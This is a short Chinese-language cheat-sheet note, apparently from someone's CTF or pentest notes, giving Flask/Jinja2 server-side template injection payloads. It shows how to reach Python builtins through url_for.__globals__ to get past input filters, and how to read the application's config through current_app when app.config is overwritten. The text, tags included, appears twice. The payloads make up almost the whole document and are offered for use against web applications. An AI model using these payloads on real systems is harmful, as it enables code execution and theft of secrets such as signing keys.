借助url_for注入.md
{{url_for.__globals__['__builtins__']}}
这玩意可以获取到各种内置函数,绕过一些变态的过滤
{{url_for.__globals__['current_app'].config}}
如果app.config被覆写了的话就用这个
#Web #flask #SSTI #urlfor #globals #bypass #python
{{url_for.__globals__['__builtins__']}}
这玩意可以获取到各种内置函数,绕过一些变态的过滤
{{url_for.__globals__['current_app'].config}}
如果app.config被覆写了的话就用这个
#Web #flask #SSTI #urlfor #globals #bypass #python